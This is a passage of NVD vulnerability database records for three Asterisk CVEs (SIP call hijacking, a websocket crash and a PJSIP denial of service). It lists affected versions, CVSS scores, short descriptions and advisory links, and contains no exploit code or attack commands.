            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "65C549ED-B864-47C9-ACD8-C695FC7DAE57",
              "versionEndExcluding": "16.6.2",
              "versionStartIncluding": "16.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "43F12809-5F7E-4B99-A028-30B43BAFB5A6",
              "versionEndExcluding": "17.0.1",
              "versionStartIncluding": "17.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9FC7665A-FF2F-4A20-B695-96C2217D268E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "18C39C0A-7F81-4734-8C1D-4FFDF070F526",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "F809DB3A-457F-4DEF-9B11-E3FCDF2D8466",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "1F170494-F60A-42C2-A2CE-1BB5BDCC8200",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "2A28B713-6CBB-4F4D-A54B-17758DD35EE9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B7D110F5-E431-4F31-8723-494D20D9108D",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in channels/chan_sip.c in Sangoma Asterisk 13.x before 13.29.2, 16.x before 16.6.2, and 17.x before 17.0.1, and Certified Asterisk 13.21 before cert5. A SIP request can be sent to Asterisk that can change a SIP peer\u0027s IP address. A REGISTER does not need to occur, and calls can be hijacked as a result. The only thing that needs to be known is the peer\u0027s name; authentication details such as passwords do not need to be known. This vulnerability is only exploitable when the nat option is set to the default, or auto_force_rport."
    },
    {
      "lang": "es",
      "value": "Se ha descubierto un problema en channels/chan_sip.c en Sangoma Asterisk 13.x antes de 13.29.2, 16.x antes de 16.6.2, y 17.x antes de 17.0.1, y Certified Asterisk 13.21 antes de cert5. Una solicitud SIP puede ser enviada a Asterisk que puede cambiar la direcci\u00f3n IP de un peer SIP. Un REGISTRO no necesita ocurrir, y las llamadas pueden ser secuestradas como resultado. Lo \u00fanico que se necesita conocer es el nombre del peer; los detalles de autenticaci\u00f3n como las contrase\u00f1as no necesitan ser conocidos. Esta vulnerabilidad s\u00f3lo es explotable cuando la opci\u00f3n nat est\u00e1 configurada por defecto, o auto_force_rport"
    }
  ],
  "id": "CVE-2019-18790",
  "lastModified": "2024-11-21T04:33:34.090",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.8,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 4.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 2.5,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2019-11-22T17:15:11.740",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2019-006.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.asterisk.org/downloads/security-advisories"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2019-006.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.asterisk.org/downloads/security-advisories"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-862"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2018-09-24 22:29

Modified

2024-11-21 03:54

Severity ?

7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

There is a stack consumption vulnerability in the res_http_websocket.so module of Asterisk through 13.23.0, 14.7.x through 14.7.7, and 15.x through 15.6.0 and Certified Asterisk through 13.21-cert2. It allows an attacker to crash Asterisk via a specially crafted HTTP request to upgrade the connection to a websocket.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2018-009.html	Patch, Vendor Advisory
cve@mitre.org	http://packetstormsecurity.com/files/149453/Asterisk-Project-Security-Advisory-AST-2018-009.html	Third Party Advisory, VDB Entry
cve@mitre.org	http://seclists.org/fulldisclosure/2018/Sep/31	Mailing List, Patch, Third Party Advisory
cve@mitre.org	http://www.securityfocus.com/bid/105389	Third Party Advisory, VDB Entry
cve@mitre.org	http://www.securitytracker.com/id/1041694	Third Party Advisory, VDB Entry
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-28013	Issue Tracking, Third Party Advisory
cve@mitre.org	https://lists.debian.org/debian-lts-announce/2018/09/msg00034.html	Mailing List, Third Party Advisory
cve@mitre.org	https://seclists.org/bugtraq/2018/Sep/53	Mailing List, Patch, Third Party Advisory
cve@mitre.org	https://security.gentoo.org/glsa/201811-11	Third Party Advisory
cve@mitre.org	https://www.debian.org/security/2018/dsa-4320	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2018-009.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/149453/Asterisk-Project-Security-Advisory-AST-2018-009.html	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2018/Sep/31	Mailing List, Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/105389	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1041694	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-28013	Issue Tracking, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://lists.debian.org/debian-lts-announce/2018/09/msg00034.html	Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://seclists.org/bugtraq/2018/Sep/53	Mailing List, Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://security.gentoo.org/glsa/201811-11	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.debian.org/security/2018/dsa-4320	Third Party Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1
digium	certified_asterisk	13.8
digium	certified_asterisk	13.8
digium	certified_asterisk	13.8
digium	certified_asterisk	13.8
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.21
digium	certified_asterisk	13.21
debian	debian_linux	8.0
debian	debian_linux	9.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:lts:*:*:*",
              "matchCriteriaId": "8D9D833C-E847-48D0-9BC1-83B52294AF50",
              "versionEndIncluding": "13.23.0",
              "versionStartIncluding": "13.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "6072FE25-86B3-4C45-841D-60BCB1817535",
              "versionEndIncluding": "14.7.7",
              "versionStartIncluding": "14.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:standard:*:*:*",
              "matchCriteriaId": "3BF8E2D1-2583-4EC7-A274-605AB41CD3EC",
              "versionEndIncluding": "15.6.0",
              "versionStartIncluding": "15.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert12:*:*:lts:*:*:*",
              "matchCriteriaId": "BFFD88AD-C82E-4C5C-9C4F-8A49176E3E52",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert13:*:*:lts:*:*:*",
              "matchCriteriaId": "6797C78B-BB9A-46B4-8F0B-492FB1988BB2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert14:*:*:lts:*:*:*",
              "matchCriteriaId": "10A38D53-6C8E-493E-8207-F4CF7D754A5D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert15:*:*:lts:*:*:*",
              "matchCriteriaId": "4CC0C753-9179-4C71-AFD8-C4601D8C865A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert16:*:*:lts:*:*:*",
              "matchCriteriaId": "169467F0-A818-4E58-884A-8409E376DCE2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert17:*:*:lts:*:*:*",
              "matchCriteriaId": "DC59BE10-CFBF-43DC-99C8-81A20C020395",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert18:*:*:lts:*:*:*",
              "matchCriteriaId": "911BAB3E-20E4-4B34-80AC-94324BFA36BE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert3:*:*:lts:*:*:*",
              "matchCriteriaId": "F0AEB812-85F2-4030-A8F8-D96F72C22BEE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert4:*:*:lts:*:*:*",
              "matchCriteriaId": "2E91D289-8971-4259-A969-1597EDB51E78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert5:*:*:lts:*:*:*",
              "matchCriteriaId": "948496CC-B5D4-41E5-9560-F59183C99209",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert6:*:*:lts:*:*:*",
              "matchCriteriaId": "1D2AD7E2-D830-48D3-9D7B-4B3D36884E75",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert7:*:*:lts:*:*:*",
              "matchCriteriaId": "79F2CF46-8580-4AFC-AA40-42611C17AB77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert8:*:*:lts:*:*:*",
              "matchCriteriaId": "B6BC624E-D8A6-4E1F-B8B8-E4EB743AC1A4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8:cert1:*:*:lts:*:*:*",
              "matchCriteriaId": "0734E999-DC1E-4107-83D6-31A08F134168",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8:cert2:*:*:lts:*:*:*",
              "matchCriteriaId": "2FE884C8-5ED3-4B4F-883A-DB7B503435D1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8:cert3:*:*:lts:*:*:*",
              "matchCriteriaId": "D64CD3D3-7EE0-4B0B-A66E-976CC7507CB2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8:cert4:*:*:lts:*:*:*",
              "matchCriteriaId": "CFA9BFA1-6C15-4702-B2AC-1E2D3E6B4312",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1:*:*:lts:*:*:*",
              "matchCriteriaId": "4678389A-2EE0-49FC-AEA6-45CAEEF61F38",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert2:*:*:lts:*:*:*",
              "matchCriteriaId": "4100EF36-CDBB-493B-9D03-E1B70C5F055A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert3:*:*:lts:*:*:*",
              "matchCriteriaId": "859F4687-C937-476C-9DA6-2A0B18BEF3F5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert4:*:*:lts:*:*:*",
              "matchCriteriaId": "10E6C1A9-2917-471F-92EB-249E25F234C5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert5:*:*:lts:*:*:*",
              "matchCriteriaId": "76C3CE8D-C4FC-4A1B-AC6A-5C27BE836DBD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert6:*:*:lts:*:*:*",
              "matchCriteriaId": "B95DE43E-F864-4A8E-8D49-3E2D7CFE6BFE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert7:*:*:lts:*:*:*",
              "matchCriteriaId": "CE887232-A798-4179-B870-01B26685D8BA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert8:*:*:lts:*:*:*",
              "matchCriteriaId": "7D19CBBB-8ED0-45B9-8977-6CCCA82DFF1E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert9:*:*:lts:*:*:*",
              "matchCriteriaId": "79E404AC-A27E-49AE-891D-CA9C7164D8D2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21:cert1:*:*:lts:*:*:*",
              "matchCriteriaId": "BA930626-B4BA-4A2D-AF55-B4F0E94B1BB6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21:cert2:*:*:lts:*:*:*",
              "matchCriteriaId": "85583966-C42B-4A27-B19D-B3E1C956A5A3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "There is a stack consumption vulnerability in the res_http_websocket.so module of Asterisk through 13.23.0, 14.7.x through 14.7.7, and 15.x through 15.6.0 and Certified Asterisk through 13.21-cert2. It allows an attacker to crash Asterisk via a specially crafted HTTP request to upgrade the connection to a websocket."
    },
    {
      "lang": "es",
      "value": "Hay una vulnerabilidad de consumo de pila en el m\u00f3dulo res_http_websocket.so de Asterisk hasta la versi\u00f3n 13.23.0; versiones 14.7.x anteriores a la 14.7.7 y las versiones 15.x anteriores a la 15.6.0, as\u00ed como Certified Asterisk hasta la versi\u00f3n 13.21-cert2. Permite que un atacante provoque el cierre inesperado de Asterisk mediante una petici\u00f3n HTTP para actualizar la conexi\u00f3n a un websocket."
    }
  ],
  "id": "CVE-2018-17281",
  "lastModified": "2024-11-21T03:54:10.270",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2018-09-24T22:29:01.580",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2018-009.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/149453/Asterisk-Project-Security-Advisory-AST-2018-009.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2018/Sep/31"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/105389"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1041694"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Third Party Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28013"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2018/09/msg00034.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://seclists.org/bugtraq/2018/Sep/53"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://security.gentoo.org/glsa/201811-11"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.debian.org/security/2018/dsa-4320"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2018-009.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/149453/Asterisk-Project-Security-Advisory-AST-2018-009.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2018/Sep/31"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/105389"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1041694"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Third Party Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28013"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2018/09/msg00034.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://seclists.org/bugtraq/2018/Sep/53"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://security.gentoo.org/glsa/201811-11"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.debian.org/security/2018/dsa-4320"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-400"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2014-04-18 22:14

Modified

2024-11-21 02:06

Severity ?

Summary

res/res_pjsip_exten_state.c in the PJSIP channel driver in Asterisk Open Source 12.x before 12.1.0 allows remote authenticated users to cause a denial of service (crash) via a SUBSCRIBE request without any Accept headers, which triggers an invalid pointer dereference.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-004-12.diff	Patch
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-004.html	Patch, Vendor Advisory
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-23139
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-004-12.diff	Patch
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-004.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-23139

Impacted products

Vendor	Product	Version
digium	asterisk	12.0.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B446105E-6C8E-495A-BF83-A33CB33485A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3B4D6D24-A718-4962-AD4E-F19AFB03BFF4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BE2F0D0D-761C-4338-93F0-506E94E57000",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "3D38DFCA-E357-4A28-8F03-FDADF40A5185",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "res/res_pjsip_exten_state.c in the PJSIP channel driver in Asterisk Open Source 12.x before 12.1.0 allows remote authenticated users to cause a denial of service (crash) via a SUBSCRIBE request without any Accept headers, which triggers an invalid pointer dereference."
    },
    {
      "lang": "es",
      "value": "res/res_pjsip_exten_state.c en el controlador de canal PJSIP en Asterisk Open Source 12.x anterior a 12.1.0 permite a usuarios remotos autenticados causar una denegaci\u00b4\u00b4on de servicio (ca\u00edda) a trav\u00e9s de una solicitud SUBSCRIBE sin cabeceras  Accept, lo que provoca una referencia de puntero invalida."
    }
  ],
  "id": "CVE-2014-2289",
  "lastModified": "2024-11-21T02:06:00.843",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "LOW",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 3.5,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:M/Au:S/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 6.8,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-04-18T22:14:38.137",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-004-12.diff"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-004.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-23139"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-004-12.diff"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-004.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-23139"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2021-07-30 14:15

